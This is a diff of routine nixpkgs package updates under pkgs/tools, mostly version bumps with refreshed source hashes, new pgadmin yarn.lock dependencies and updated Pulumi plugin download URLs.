diff options
Diffstat (limited to 'nixpkgs/pkgs/tools')
220 files changed, 2501 insertions, 1300 deletions
diff --git a/nixpkgs/pkgs/tools/X11/ckbcomp/default.nix b/nixpkgs/pkgs/tools/X11/ckbcomp/default.nix index 89bc5939299b..3a49053efcf4 100644 --- a/nixpkgs/pkgs/tools/X11/ckbcomp/default.nix +++ b/nixpkgs/pkgs/tools/X11/ckbcomp/default.nix @@ -2,14 +2,14 @@ stdenv.mkDerivation rec { pname = "ckbcomp"; - version = "1.224"; + version = "1.226"; src = fetchFromGitLab { domain = "salsa.debian.org"; owner = "installer-team"; repo = "console-setup"; rev = version; - sha256 = "sha256-oqpETbMc0J8AKqt251kmxYyA2wgXxI1V2t6oJC14MfM="; + sha256 = "sha256-gipUL+EqBeFK0/3Ds5Xi67Kl/XEJkUe02lPhf7OifXY="; }; buildInputs = [ perl ]; diff --git a/nixpkgs/pkgs/tools/X11/xprintidle/default.nix b/nixpkgs/pkgs/tools/X11/xprintidle/default.nix index 4a0d371a7fd6..33782f6ed6c6 100644 --- a/nixpkgs/pkgs/tools/X11/xprintidle/default.nix +++ b/nixpkgs/pkgs/tools/X11/xprintidle/default.nix @@ -7,14 +7,14 @@ , xorg }: -stdenv.mkDerivation rec { +stdenv.mkDerivation (finalAttrs: { pname = "xprintidle"; version = "0.2.5"; src = fetchFromGitHub { owner = "g0hl1n"; repo = "xprintidle"; - rev = version; + rev = finalAttrs.version; sha256 = "sha256-bafDUZoSFsJ3g6mtLCRechGizfrWg2qW2vnlfIzj7mQ="; }; @@ -38,4 +38,4 @@ stdenv.mkDerivation rec { platforms = platforms.linux; mainProgram = "xprintidle"; }; -} +}) diff --git a/nixpkgs/pkgs/tools/admin/aliyun-cli/default.nix b/nixpkgs/pkgs/tools/admin/aliyun-cli/default.nix index e45faef00cbe..6e3b205224fd 100644 --- a/nixpkgs/pkgs/tools/admin/aliyun-cli/default.nix +++ b/nixpkgs/pkgs/tools/admin/aliyun-cli/default.nix @@ -2,17 +2,17 @@ buildGoModule rec { pname = "aliyun-cli"; - version = "3.0.198"; + version = "3.0.199"; src = fetchFromGitHub { rev = "v${version}"; owner = "aliyun"; repo = pname; fetchSubmodules = true; - sha256 = "sha256-kIFB1wFVZTFr4tqSiBvgwqGLVq2UmG58vAqhug8giE0="; + sha256 = "sha256-fHp+sLbCsfFGK6FmhiNp7Z2y2k2baP/s4na3zsBOccU="; }; - vendorHash = "sha256-NoismcBQtVv7QOIGOqRsmau9zY+MkCAl46ll2y0hbW4="; + vendorHash = "sha256-cCjLnJxO6e03vlWIa8OF9wSce4aVNr6ak4mY5rN7TVw="; subPackages = [ "main" ]; diff --git a/nixpkgs/pkgs/tools/admin/balena-cli/default.nix b/nixpkgs/pkgs/tools/admin/balena-cli/default.nix index be18c1b15ec1..106ac4774dad 100644 --- a/nixpkgs/pkgs/tools/admin/balena-cli/default.nix +++ b/nixpkgs/pkgs/tools/admin/balena-cli/default.nix @@ -18,16 +18,16 @@ let }; in buildNpmPackage' rec { pname = "balena-cli"; - version = "18.0.0"; + version = "18.0.2"; src = fetchFromGitHub { owner = "balena-io"; repo = "balena-cli"; rev = "v${version}"; - hash = "sha256-qXOjuVIBjKvsTp9tHxlvYM2oKHLvfGToBE0tAS/F+Ug="; + hash = "sha256-u1u/53BTojAUwXk8odK8m2QohzIvypQI9c/UOQflbzE="; }; - npmDepsHash = "sha256-VmhyfhyV6mrF3pM5xQGcPowIaAzXJprOmmf4uSTetOA="; + npmDepsHash = "sha256-jNptqvHVZUXAZ19m8or1+U8nIAxDep395F6xK6EQ++c="; postPatch = '' ln -s npm-shrinkwrap.json package-lock.json diff --git a/nixpkgs/pkgs/tools/admin/elasticsearch-curator/default.nix b/nixpkgs/pkgs/tools/admin/elasticsearch-curator/default.nix index f09aad4a93e3..60bd15ce71a6 100644 --- a/nixpkgs/pkgs/tools/admin/elasticsearch-curator/default.nix +++ b/nixpkgs/pkgs/tools/admin/elasticsearch-curator/default.nix @@ -5,14 +5,14 @@ python3.pkgs.buildPythonApplication rec { pname = "elasticsearch-curator"; - version = "8.0.8"; + version = "8.0.10"; format = "pyproject"; src = fetchFromGitHub { owner = "elastic"; repo = "curator"; rev = "refs/tags/v${version}"; - hash = "sha256-G8wKeEr7TuUWlqz9hJmnJW7yxn+4WPoStVC0AX5jdHI="; + hash = "sha256-hGG7lyrVviZSKTUo+AOPIutn/mxtDo+ewFxCRdj/jts="; }; postPatch = '' diff --git a/nixpkgs/pkgs/tools/admin/fioctl/default.nix b/nixpkgs/pkgs/tools/admin/fioctl/default.nix index 06c30bda2be0..e384f38f6499 100644 --- a/nixpkgs/pkgs/tools/admin/fioctl/default.nix +++ b/nixpkgs/pkgs/tools/admin/fioctl/default.nix @@ -2,16 +2,16 @@ buildGoModule rec { pname = "fioctl"; - version = "0.40"; + version = "0.41"; src = fetchFromGitHub { owner = "foundriesio"; repo = "fioctl"; rev = "v${version}"; - sha256 = "sha256-G1CHm5z2D7l3NDmUMhubJsrXYUHb6FJ70EsYQShhsDE="; + sha256 = "sha256-N+bLW1Gf0lr5FKgd1lr84HVrhdjB+npaeS3nzYXoVl0="; }; - vendorHash = "sha256-j0tdFvOEp9VGx8OCfUruCzwVSB8thcenpvVNn7Rf0dA="; + vendorHash = "sha256-cu1TwCWdDQi2ZR96SvEeH/LIP7sZOVZoly3VczKZfRw="; ldflags = [ "-s" "-w" diff --git a/nixpkgs/pkgs/tools/admin/fits-cloudctl/default.nix b/nixpkgs/pkgs/tools/admin/fits-cloudctl/default.nix index c6aa0a2a7080..0bdfbacab571 100644 --- a/nixpkgs/pkgs/tools/admin/fits-cloudctl/default.nix +++ b/nixpkgs/pkgs/tools/admin/fits-cloudctl/default.nix @@ -5,16 +5,16 @@ buildGoModule rec { pname = "fits-cloudctl"; - version = "0.12.13"; + version = "0.12.16"; src = fetchFromGitHub { owner = "fi-ts"; repo = "cloudctl"; rev = "v${version}"; - sha256 = "sha256-Vb7jBgk052WBnlUgS5lVooi/bY49rRqCWbOO4cPkPx4="; + hash = "sha256-5Uf4glKRbxlC7ZdBW51Ter9SBt5rwas+eD4KYWOqPss="; }; - vendorHash = "sha256-NR5Jw4zCYRg6xc9priCVNH+9wOVWx3bmstc3nkQDmv8="; + vendorHash = "sha256-GFMnBd5HmjFcMhayL1enQuNxXyVdLb6RLakHNxguXks="; meta = with lib; { description = "Command-line client for FI-TS Finance Cloud Native services"; diff --git a/nixpkgs/pkgs/tools/admin/gam/default.nix b/nixpkgs/pkgs/tools/admin/gam/default.nix index 6cf340150ffb..5847bcf00d51 100644 --- a/nixpkgs/pkgs/tools/admin/gam/default.nix +++ b/nixpkgs/pkgs/tools/admin/gam/default.nix @@ -5,29 +5,28 @@ python3.pkgs.buildPythonApplication rec { pname = "gam"; - version = "6.25"; + version = "6.58"; format = "other"; src = fetchFromGitHub { owner = "GAM-team"; - repo = "gam"; + repo = "GAM"; rev = "refs/tags/v${version}"; - sha256 = "sha256-/VmBFMjCkd1xhudlcjYGGv+6tgEsyY/xqQoGdupJvOg="; + sha256 = "sha256-AIaPzYavbBlJyi9arZN8HTmUXM7Tef0SIfE07PmV9Oo="; }; sourceRoot = "${src.name}/src"; - patches = [ - # Also disables update check - ./signal_files_as_env_vars.patch - ]; - propagatedBuildInputs = with python3.pkgs; [ + chardet + cryptography distro filelock google-api-python-client google-auth google-auth-oauthlib + httplib2 + lxml passlib pathvalidate python-dateutil @@ -66,6 +65,7 @@ python3.pkgs.buildPythonApplication rec { meta = with lib; { description = "Command line management for Google Workspace"; homepage = "https://github.com/GAM-team/GAM/wiki"; + changelog = "https://github.com/GAM-team/GAM/releases/tag/v${version}"; license = licenses.asl20; maintainers = with maintainers; [ thanegill ]; }; diff --git a/nixpkgs/pkgs/tools/admin/granted/default.nix b/nixpkgs/pkgs/tools/admin/granted/default.nix index 79fc6358ed29..57eaec1acf38 100644 --- a/nixpkgs/pkgs/tools/admin/granted/default.nix +++ b/nixpkgs/pkgs/tools/admin/granted/default.nix @@ -12,16 +12,16 @@ buildGoModule rec { pname = "granted"; - version = "0.20.7"; + version = "0.21.0"; src = fetchFromGitHub { owner = "common-fate"; repo = pname; rev = "v${version}"; - sha256 = "sha256-AGpR587vz1t5z/J09n4/XvFPgbwb66wRTfSVOTCWeSU="; + sha256 = "sha256-hNbn1bBC9dNiThwi1+Mh45s/9DAwoI8XC4ZjB6Ls8sw="; }; - vendorHash = "sha256-yw/hl82RQPjZB0SsVr4OPDUsFH2TY6i4RpVE7wd4fwk="; + vendorHash = "sha256-I4sds5r61oGop+EtOpDgTYwLbSVBBSBmNbRU56sCYjo="; nativeBuildInputs = [ makeWrapper ]; diff --git a/nixpkgs/pkgs/tools/admin/kics/default.nix b/nixpkgs/pkgs/tools/admin/kics/default.nix index 3b4a8b6859d7..f4c812308cec 100644 --- a/nixpkgs/pkgs/tools/admin/kics/default.nix +++ b/nixpkgs/pkgs/tools/admin/kics/default.nix @@ -7,16 +7,16 @@ buildGoModule rec { pname = "kics"; - version = "1.7.12"; + version = "1.7.13"; src = fetchFromGitHub { owner = "Checkmarx"; repo = "kics"; rev = "v${version}"; - hash = "sha256-Yf4IvhXwhLD+Cae9bp6iCzlmnw9XQ7G2yOLqRTcK7ac="; + hash = "sha256-5+ZxQaLc5KBl+e//9FQAM+isMU8QchtHwRm4rMr7Hd0="; }; - vendorHash = "sha256-psyFivwS9d6+7S+1T7vonhofxHc0y2btXgc5HSu94Dg="; + vendorHash = "sha256-+XszRGnGw/YmrU8SazoNSZkA5s1aFWf3mIBZtK4UBy0="; subPackages = [ "cmd/console" ]; diff --git a/nixpkgs/pkgs/tools/admin/lego/default.nix b/nixpkgs/pkgs/tools/admin/lego/default.nix index c79b0e0d243a..d07c05db1381 100644 --- a/nixpkgs/pkgs/tools/admin/lego/default.nix +++ b/nixpkgs/pkgs/tools/admin/lego/default.nix @@ -2,16 +2,16 @@ buildGoModule rec { pname = "lego"; - version = "4.14.2"; + version = "4.15.0"; src = fetchFromGitHub { owner = "go-acme"; repo = pname; rev = "v${version}"; - sha256 = "sha256-o0opYPJk8QURDSPuxEoITyhu3PNvuvcT9ZsnWPJmoAY="; + sha256 = "sha256-j5TboKYv4xycpCXnuFP/37ioiS89G7eeViEmGwB2BUY="; }; - vendorHash = "sha256-RW2ybMX55bds3uo90dGzBJPsmv9iIqllt5Ap2WF8PnQ="; + vendorHash = "sha256-uniml5D8887cQyxxZIDhYLni/+r6ZtZ9nJBKPtNeDtI="; doCheck = false; diff --git a/nixpkgs/pkgs/tools/admin/okta-aws-cli/default.nix b/nixpkgs/pkgs/tools/admin/okta-aws-cli/default.nix index f9a4fad19554..a3b177af6c8c 100644 --- a/nixpkgs/pkgs/tools/admin/okta-aws-cli/default.nix +++ b/nixpkgs/pkgs/tools/admin/okta-aws-cli/default.nix @@ -2,7 +2,7 @@ buildGoModule rec { pname = "okta-aws-cli"; - version = "2.1.0"; + version = "2.1.2"; subPackages = [ "cmd/okta-aws-cli" ]; @@ -10,7 +10,7 @@ buildGoModule rec { owner = "okta"; repo = "okta-aws-cli"; rev = "v${version}"; - sha256 = "sha256-ovmN/BYQInbfvMaSl7WNXC7dBkLMyZdZstc164yj5Qo="; + sha256 = "sha256-MNaoCefJwUPWYPZ+AtQUHhm1ZKSFq+hCGGAFwBxrbWI="; }; vendorHash = "sha256-SjABVO6tHYRc/1pYjOqfZP+NfnK1/WnAcY5NQ4hMssE="; diff --git a/nixpkgs/pkgs/tools/admin/pgadmin/default.nix b/nixpkgs/pkgs/tools/admin/pgadmin/default.nix index 586d553f4109..dcd250b9e837 100644 --- a/nixpkgs/pkgs/tools/admin/pgadmin/default.nix +++ b/nixpkgs/pkgs/tools/admin/pgadmin/default.nix @@ -14,14 +14,14 @@ let pname = "pgadmin"; - version = "8.2"; - yarnHash = "sha256-uMSgpkYoLD32VYDAkjywC9bZjm7UKA0hhwVNc/toEbA="; + version = "8.3"; + yarnHash = "sha256-nhHss4YOFu2cGkIhA909lIdnf3H3pD9BQx4PvP9+9c0="; src = fetchFromGitHub { owner = "pgadmin-org"; repo = "pgadmin4"; rev = "REL-${lib.versions.major version}_${lib.versions.minor version}"; - hash = "sha256-RfpZXy265kwpMsWUBDVfbL/0eX0By79I4VNkG8zwVOs="; + hash = "sha256-2L/JLkuyjx1oD9akQULmzW0FlSq8/MQlZ1HmlO81jj0="; }; # keep the scope, as it is used throughout the derivation and tests diff --git a/nixpkgs/pkgs/tools/admin/pgadmin/yarn.lock b/nixpkgs/pkgs/tools/admin/pgadmin/yarn.lock index cf3e188e8674..c6573efabf78 100644 --- a/nixpkgs/pkgs/tools/admin/pgadmin/yarn.lock +++ b/nixpkgs/pkgs/tools/admin/pgadmin/yarn.lock @@ -4593,7 +4593,7 @@ combined-stream@^1.0.8: dependencies: delayed-stream "~1.0.0" -"commander@^2.20.0", "commander@^2.8.1": +"commander@^2.19.0", "commander@^2.20.0", "commander@^2.8.1": version "2.20.3" resolved "https://registry.npmjs.org/commander/-/commander-2.20.3.tgz#fd485e84c03eb4881c20722ba48035e8531aeb33" integrity sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ== @@ -5369,6 +5369,11 @@ dir-glob@^3.0.1: dependencies: path-type "^4.0.0" +discontinuous-range@1.0.0: + version "1.0.0" + resolved "https://registry.npmjs.org/discontinuous-range/-/discontinuous-range-1.0.0.tgz#e38331f0844bba49b9a9cb71c771585aab1bc65a" + integrity sha512-c68LpLbO+7kP/b1Hr1qs8/BJ09F5khZGTxqxZuhzxpmwJKOgRFHJWIb9/KmqnqHhLdO55aOxFH/EGBvUQbL/RQ== + dnd-core@14.0.1: version "14.0.1" resolved "https://registry.npmjs.org/dnd-core/-/dnd-core-14.0.1.tgz#76d000e41c494983210fb20a48b835f81a203c2e" @@ -6490,6 +6495,11 @@ get-proxy@^2.0.0: dependencies: npm-conf "^1.1.0" +get-stdin@=8.0.0: + version "8.0.0" + resolved "https://registry.npmjs.org/get-stdin/-/get-stdin-8.0.0.tgz#cbad6a73feb75f6eeb22ba9e01f89aa28aa97a53" + integrity sha512-sY22aA6xchAzprjyqmSEQv4UbAAzRN0L2dQB0NlN5acTTK9Don6nhoc3eAbUnpZiCANAMfd/+40kVdKfFygohg== + "get-stream@3.0.0", "get-stream@^3.0.0": version "3.0.0" resolved "https://registry.npmjs.org/get-stream/-/get-stream-3.0.0.tgz#8e943d1358dc37555054ecbe2edb05aa174ede14" @@ -8903,6 +8913,11 @@ moment@^2.29.4: resolved "https://registry.npmjs.org/moment/-/moment-2.29.4.tgz#3dbe052889fe7c1b2ed966fcb3a77328964ef108" integrity sha512-5LC9SOxjSc2HF6vO2CyuTDNivEdoz2IvyJJGj6X8DJ0eFyfszE0QiEd+iXmBvUP3WHxSjFH/vIsA0EN00cgr8w== +moo@^0.5.0: + version "0.5.2" + resolved "https://registry.npmjs.org/moo/-/moo-0.5.2.tgz#f9fe82473bc7c184b0d32e2215d3f6e67278733c" + integrity sha512-iSAJLHYKnX41mKcJKjqvnAN9sf0LMDTXDEvFv+ffuRR9a1MIuXLjMNL6EsnDHSkKLTWNqQQ5uo61P4EbU4NU+Q== + mousetrap@^1.6.3: version "1.6.5" resolved "https://registry.npmjs.org/mousetrap/-/mousetrap-1.6.5.tgz#8a766d8c272b08393d5f56074e0b5ec183485bf9" @@ -8958,6 +8973,16 @@ natural-compare@^1.4.0: resolved "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz#4abebfeed7541f2c27acfb29bdbbd15c8d5ba4f7" integrity sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw== +nearley@^2.20.1: + version "2.20.1" + resolved "https://registry.npmjs.org/nearley/-/nearley-2.20.1.tgz#246cd33eff0d012faf197ff6774d7ac78acdd474" + integrity sha512-+Mc8UaAebFzgV+KpI5n7DasuuQCHA89dmwm7JXw3TV43ukfNQ9DnBH3Mdb2g/I4Fdxc26pwimBWvjIw0UAILSQ== + dependencies: + commander "^2.19.0" + moo "^0.5.0" + railroad-diagrams "^1.0.0" + randexp "0.4.6" + neatequal@^1.0.0: version "1.0.0" resolved "https://registry.npmjs.org/neatequal/-/neatequal-1.0.0.tgz#2ee1211bc9fa6e4c55715fd210bb05602eb1ae3b" @@ -10210,6 +10235,19 @@ raf@^3.4.1: dependencies: performance-now "^2.1.0" +railroad-diagrams@^1.0.0: + version "1.0.0" + resolved "https://registry.npmjs.org/railroad-diagrams/-/railroad-diagrams-1.0.0.tgz#eb7e6267548ddedfb899c1b90e57374559cddb7e" + integrity sha512-cz93DjNeLY0idrCNOH6PviZGRN9GJhsdm9hpn1YCS879fj4W+x5IFJhhkRZcwVgMmFF7R82UA/7Oh+R8lLZg6A== + +randexp@0.4.6: + version "0.4.6" + resolved "https://registry.npmjs.org/randexp/-/randexp-0.4.6.tgz#e986ad5e5e31dae13ddd6f7b3019aa7c87f60ca3" + integrity sha512-80WNmd9DA0tmZrw9qQa62GPPWfuXJknrmVmLcxvq4uZBdYqb1wYoKTmnlGUchvVWe0XiLupYkBoXVOxz3C8DYQ== + dependencies: + discontinuous-range "1.0.0" + ret "~0.1.10" + "randombytes@^2.0.0", "randombytes@^2.0.1", "randombytes@^2.0.5", "randombytes@^2.1.0": version "2.1.0" resolved "https://registry.npmjs.org/randombytes/-/randombytes-2.1.0.tgz#df6f84372f0270dc65cdf6291349ab7a473d4f2a" @@ -10842,6 +10880,11 @@ responselike@1.0.2: dependencies: lowercase-keys "^1.0.0" +ret@~0.1.10: + version "0.1.15" + resolved "https://registry.npmjs.org/ret/-/ret-0.1.15.tgz#b8a4825d5bdb1fc3f6f53c2bc33f81388681c7bc" + integrity sha512-TTlYpa+OL+vMMNG24xSlQGEJ3B/RzEfUlLct7b5G/ytav+wPrplCpVMFuwzXbkecJrb6IYo1iFb0S9v37754mg== + retry@^0.12.0: version "0.12.0" resolved "https://registry.npmjs.org/retry/-/retry-0.12.0.tgz#1b42a6266a21f07421d1b0b54b7dc167b01c013b" @@ -11331,6 +11374,15 @@ sprintf-js@~1.0.2: resolved "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz#04e6926f662895354f3dd015203633b857297e2c" integrity sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g== +sql-formatter@^15.1.2: + version "15.1.2" + resolved "https://registry.npmjs.org/sql-formatter/-/sql-formatter-15.1.2.tgz#86df2592eedf6d422244e10e00a74380c22791b7" + integrity sha512-zBrLBclCNurCsQaO6yMvkXzHvv7eJPjiF8LIEQ5HdBV/x6UuWIZwqss3mlZ/6HLj+VYhFKeHpQnyLuZWG2agKQ== + dependencies: + argparse "^2.0.1" + get-stdin "=8.0.0" + nearley "^2.20.1" + ssri@^10.0.0: version "10.0.4" resolved "https://registry.npmjs.org/ssri/-/ssri-10.0.4.tgz#5a20af378be586df139ddb2dfb3bf992cf0daba6" @@ -12716,8 +12768,3 @@ zustand@^4.4.1: resolved "https://github.com/pgadmin-org/react-data-grid.git#200d2f5e02de694e3e9ffbe177c279bc40240fb8" dependencies: "clsx" "^1.1.1" -"react-data-grid@https://github.com/pgadmin-org/react-data-grid.git#200d2f5e02de694e3e9ffbe177c279bc40240fb8": - version "7.0.0-beta.14" - resolved "https://github.com/pgadmin-org/react-data-grid.git#200d2f5e02de694e3e9ffbe177c279bc40240fb8" - dependencies: - "clsx" "^1.1.1" diff --git a/nixpkgs/pkgs/tools/admin/procs/default.nix b/nixpkgs/pkgs/tools/admin/procs/default.nix index c72c498f7cb2..49666f9d6805 100644 --- a/nixpkgs/pkgs/tools/admin/procs/default.nix +++ b/nixpkgs/pkgs/tools/admin/procs/default.nix @@ -2,16 +2,16 @@ rustPlatform.buildRustPackage rec { pname = "procs"; - version = "0.14.4"; + version = "0.14.5"; src = fetchFromGitHub { owner = "dalance"; repo = "procs"; rev = "v${version}"; - hash = "sha256-Gx3HRGWi+t/wT1WrbuHXVyX+cP+JvZV8lBun1Qs8Xys="; + hash = "sha256-9kxJrvlaEoEkPPoU4/9IlX2TvDUG9VZwtb4a3N9rAsc="; }; - cargoHash = "sha256-0eLOAZnHbnvT8qgSfWO/RKXIdRr5wwfUQ9YQ77I6okQ="; + cargoHash = "sha256-2g+6FmcO4t9tjLq7xkBaLAgbzQoBgskr8csM/1tHbWI="; nativeBuildInputs = [ installShellFiles ] ++ lib.optionals stdenv.isDarwin [ rustPlatform.bindgenHook ]; diff --git a/nixpkgs/pkgs/tools/admin/pulumi-bin/data.nix b/nixpkgs/pkgs/tools/admin/pulumi-bin/data.nix index 66db43918161..c5862887c553 100644 --- a/nixpkgs/pkgs/tools/admin/pulumi-bin/data.nix +++ b/nixpkgs/pkgs/tools/admin/pulumi-bin/data.nix @@ -1,12 +1,12 @@ # DO NOT EDIT! This file is generated automatically by update.sh { }: { - version = "3.107.0"; + version = "3.108.1"; pulumiPkgs = { x86_64-linux = [ { - url = "https://get.pulumi.com/releases/sdk/pulumi-v3.107.0-linux-x64.tar.gz"; - sha256 = "14hkk04jkfld8y051dxpigqhgx7s7n9d2sa4walkrz85vw928v2k"; + url = "https://get.pulumi.com/releases/sdk/pulumi-v3.108.1-linux-x64.tar.gz"; + sha256 = "179hffqii76pc1ir8819af5vy6iiyygx5k33zpff0pg5bc6xm4w0"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aiven-v6.12.0-linux-amd64.tar.gz"; @@ -17,8 +17,8 @@ sha256 = "17c5960kcjzz3hl4nwh41qkpj67072cfs2bxbqin9b2b33x9bfvy"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-alicloud-v3.49.0-linux-amd64.tar.gz"; - sha256 = "07wyxig26ss9a4jcdwwrpy615ii17gky9s0ncz1nlrwrgiazmah0"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-alicloud-v3.49.1-linux-amd64.tar.gz"; + sha256 = "17isifx3ysxdi4lrl8blkpzvcxn2yzxvyx3xsr22mqna57lzvh3l"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-artifactory-v6.1.4-linux-amd64.tar.gz"; @@ -29,20 +29,20 @@ sha256 = "06gz2xqmwms01r4p59l9yvv3w3jvmlyaqr8y2z91hn0im4l8df2b"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aws-v6.23.0-linux-amd64.tar.gz"; - sha256 = "12bcq08my84h6pk736s4hswpvqxkrnw855jc6hqiiaskk3yk5a2i"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aws-v6.24.0-linux-amd64.tar.gz"; + sha256 = "1rimqplyil0r84n7yw9nzjx8y4r9k6fnyp7my1qb1wqy6w8sx5y4"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuread-v5.47.1-linux-amd64.tar.gz"; - sha256 = "068hi7f8jyia6rsmlzyc2vc7qgyl7b7ll05kx5czjrq132mv56d6"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuread-v5.47.2-linux-amd64.tar.gz"; + sha256 = "0d2swa7irx1xr18gs4p3can1bp1pckk5cggfl5cdfkrz966rv8cb"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuredevops-v2.15.0-linux-amd64.tar.gz"; sha256 = "0jaqkf7ibp0vxrvz6imaal9iyf60p6hhay7vmh62vmm0jgdv1ply"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azure-v5.67.0-linux-amd64.tar.gz"; - sha256 = "0q801z0gvdp5kwxd2n59kl45lil78mgxwi22zcwnwh28bf48303n"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azure-v5.67.1-linux-amd64.tar.gz"; + sha256 = "01yh8cz2nq27ir6smv6j9rhnv796id961grd2ayjyjcrpin6b0pd"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-cloudflare-v5.21.0-linux-amd64.tar.gz"; @@ -73,8 +73,8 @@ sha256 = "0f4czs3hjibmwvswm2zgjq3nys2sp4lr7xy2rpm4k7msdcsxk5kb"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-gcp-v7.11.0-linux-amd64.tar.gz"; - sha256 = "181753mpnph9zgzc90rd9v00iqw1sjblbh4i6y7ybschmi2vcvwa"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-gcp-v7.11.2-linux-amd64.tar.gz"; + sha256 = "0hnhgiss847s7znii3fd3c0w1i7f582khrcvb4a422ws89nrf070"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-github-v6.0.0-linux-amd64.tar.gz"; @@ -93,32 +93,32 @@ sha256 = "0pz7jga19pwwx7ba5364b6sv1zsmxvnldakdh6641fqp9wl6smxp"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-kubernetes-v4.8.0-linux-amd64.tar.gz"; - sha256 = "1z6nh7piwa54l81c32i25dx079m26a89q894m63hyjg3z47wqlci"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-kubernetes-v4.8.1-linux-amd64.tar.gz"; + sha256 = "0fsif489vj0cnag7q1ap7hb2lhfrhihbpnjygghwlqdf9nrcr54i"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-linode-v4.14.0-linux-amd64.tar.gz"; - sha256 = "0rzhdhb4lgjfzfhnmvs875axqivjwwfq6d62v7j6ksnxynlfzqmj"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-linode-v4.15.0-linux-amd64.tar.gz"; + sha256 = "10p4gsz6qj93fd0f9d1pvql501gpyrl684465b51xxrh29506nwk"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mailgun-v3.5.1-linux-amd64.tar.gz"; sha256 = "1k2pa1wbh49qkg99khdyzj1qfjld74ijzn4y94c27vjsm9wmn7ka"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mysql-v3.2.1-linux-amd64.tar.gz"; - sha256 = "068zzad887pqsdyx93xdj5vnkr7pvsx7i4sqzm536g53k79xq54l"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mysql-v3.2.3-linux-amd64.tar.gz"; + sha256 = "010x3wa1c3cjccli0b1y25xd6jkvhdcxahfwda8jv31b5ilsv3zx"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-openstack-v3.15.1-linux-amd64.tar.gz"; sha256 = "135br9q8f1ic0xvrhx9yii5giq1h5qzlyb5kyvnyb3hwx49f1ik6"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-postgresql-v3.10.1-linux-amd64.tar.gz"; - sha256 = "1vi1mhkrxrl5ajaa93vfziii12w0wwlrxd6hyvvxwfkkxn0n3ivm"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-postgresql-v3.11.0-linux-amd64.tar.gz"; + sha256 = "14blk6gfdxjr1l3gxfj3f1ljz66yi8z35lva3fy75fs5gy6z1wnb"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-random-v4.15.1-linux-amd64.tar.gz"; - sha256 = "1za2d3cad1grcnkkqmyn9b7wlz9ayimsv17ygg638wh7v34w0yjq"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-random-v4.16.0-linux-amd64.tar.gz"; + sha256 = "1wvdncw149ch6hi3fw7fibk78j2clbxlwmf4hivai7zhh8ikg1nq"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-snowflake-v0.49.0-linux-amd64.tar.gz"; @@ -133,8 +133,8 @@ sha256 = "0jiny0s6hvzzcgv7zkdmc4d0rdcwpq49dz7fqsaz81maz7kck8a5"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tailscale-v0.14.0-linux-amd64.tar.gz"; - sha256 = "0q23ck7ifs42cfd1iadcn1djhmpg203z1r7nxlfhnp3h0f7z1p5h"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tailscale-v0.15.0-linux-amd64.tar.gz"; + sha256 = "19z0adq7dy7cvfkbi8xl3wq1shm4rjswjslnfq5fflyky8pgjyy3"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tls-v5.0.1-linux-amd64.tar.gz"; @@ -145,8 +145,8 @@ sha256 = "1nc72m6d0kixs0mih83f6bad2dwwmwz89r6w8dkhi0071bg28lgc"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-venafi-v1.6.3-linux-amd64.tar.gz"; - sha256 = "0jfp8wqb6gkq7ndihi4bpcm2s0vz1xkc2m4i58hy80zfvdiq3ipz"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-venafi-v1.7.0-linux-amd64.tar.gz"; + sha256 = "0w7cgafkz1r55bz8n51v2rqhmmxzrf7ma60awzlfd2apyihghxyp"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-vsphere-v4.9.2-linux-amd64.tar.gz"; @@ -163,8 +163,8 @@ ]; x86_64-darwin = [ { - url = "https://get.pulumi.com/releases/sdk/pulumi-v3.107.0-darwin-x64.tar.gz"; - sha256 = "0x05cbvwvmwrfdrnwr4ca9g0d0rs2pjyqgw5bqvrh0k7ll5z10dz"; + url = "https://get.pulumi.com/releases/sdk/pulumi-v3.108.1-darwin-x64.tar.gz"; + sha256 = "1993jk9wraxxds7phlpp2kwhn80k6hvf54nb5nj9883nsm5n4syz"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aiven-v6.12.0-darwin-amd64.tar.gz"; @@ -175,8 +175,8 @@ sha256 = 